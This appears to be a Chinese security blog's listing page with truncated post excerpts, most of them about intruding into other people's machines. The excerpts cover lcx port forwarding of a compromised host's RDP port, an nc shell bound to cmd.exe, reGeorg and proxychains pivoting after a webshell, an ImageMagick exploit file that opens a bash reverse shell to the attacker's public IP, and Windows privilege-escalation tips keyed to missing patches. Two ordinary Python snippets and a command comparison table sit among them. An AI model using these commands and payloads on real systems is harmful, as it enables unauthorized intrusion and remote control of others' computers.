一、lcx的使用 1.肉鸡上执行:lcx.exe –slave 公网ip +端口 肉鸡ip +端口 例如:lcx.exe -slave xxx.xxx.xxx.xxx 10000 127.0.0.1 3389 意思是把肉鸡的3389端口转发到xxx.xxx.xxx.xxx公网的10000端口 2.公网ip机器上执行 Lcx.exe –listen 10000 10001 例如:Lcx.exe –listen 10000 10001 意思是监听公网ip机器上的10000端口请求,并将10000的请求传送给本地10001端口。 此时,RDP连接,只需要输入 127.0.0.1:10001,即可远程连接到肉鸡上。 二、nc反弹cmdshell 1.开启肉鸡代理执行cmdshell 在肉鸡上执行 nc -l -p 2333 -t -e cmd.exe 意思是,肉鸡监听本地的2333 […]
Author: 系统自定义
linux下reGeorgSocksProxy.py 与proxychains的全局代理使用方法
主要使用场景: 已经拿到目标服务器的webshell了,而且目标也开启3389等远程端口,但是用的是反向代理,内网IP,无法远程过去。 所以,你需要通过上传一个aspx或者php等之类的代理脚本(reGeorgSocksProxy),然后通过脚本,把目标电脑开启代理,使用proxychains设置本地代理,然后使用ssh或者远程登陆工具,连接对方电脑,就像连接本地内网一样,例如:要入侵的目标在对方内网的IP是192.168.12.11,那么,我们使用proxychains代理了以后,直接使用远程链接工具链接192.168.12.11即可。代理方式为socks4哦…. 1.先安装proxychains:sudo dpkg -i proxychains #如果没有这个包,可以用这个命令下载 sudo apt-get download proxychains 便于 […]
Linux和windows dos命令比较(不定期更新)
命令说明 DOS命令 Linux命令 复制文件 copy cp 转移文件 move mv 列举文件 dir ls 清除屏幕 cls clear 关闭Shell exit exit 显示和设置日期 […]
imagemagick 漏洞的利用说明
最近imagemagick 曝光率那么高,但群里问怎么利用的却很多。 这里自己做一个利用笔记,以及容易出现的错误。 对于网络上传播的利用说明,那个方式并没什么问题,但是太绕了。 说个简单的。下列脚本放入 后缀名png即可。(说明:该脚本是通过 bash命令把端口反弹出去,类似win肉鸡上执行了 nc -t -e cmd.exe 你的公网IP 反弹端口) push graphic-context viewbox 0 0 640 480 fill ‘url(https://example.com/image.jpg”|/bin/bash -i >& /dev/tcp/你的公网IP/反弹端口 0>&1″)’ pop graphic-context 重点是如何利用,这里需要个nc,(百度:ne […]
python 之新建文件/文件夹新建
#创建文件夹 #encoding:utf-8 import os #需要导入os包 def GetDesktopPath(): #获取当前操作系统的桌面路径 return os.path.join(os.path.expanduser(“~”), ‘Desktop’) os.mkdir(r’home’) #在桌面新建home目录 os.makedirs(r’home/home/home’) #在ho […]
python 爬虫
#encoding:utf-8 #编码设定,为了输出中文,python2.7 print中文和raw_input 中文,显示乱码 import urllib2 # 需要urllib2 包 import urllib #需要urllib 包 import re #需要re正则包 data = raw_input(“请输入域名:\n”.decode(‘utf-8’).encode(‘gbk’)) #输入域名 print (“结果如下:”.decode(“utf-8”).encode(‘gbk’)) #提示一下内容 […]
关于windows渗透提权的各种姿势
【 web提权 】 1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user 2.当提权成功,3389没开的情况下,上传开3389的vps没成功时,试试上传rootkit.asp 用刚提权的用户登录进去就是system权限,再试试一般就可以了。 3.cmd拒绝访问的话就自己上传一个cmd.exe 自己上传的后缀是不限制后缀的,cmd.exe/cmd.com/cmd.txt 都可以。 4.cmd命令:systeminfo,看看有没有KB952004、KB956572、KB970483这三个补丁,如果没有,第一个是pr提权,第二个是巴西烤肉提权,第三个是iis6.0提权。 6.c:\windows\temp\cookies\ 这个目录 7.找sa密码或是 […]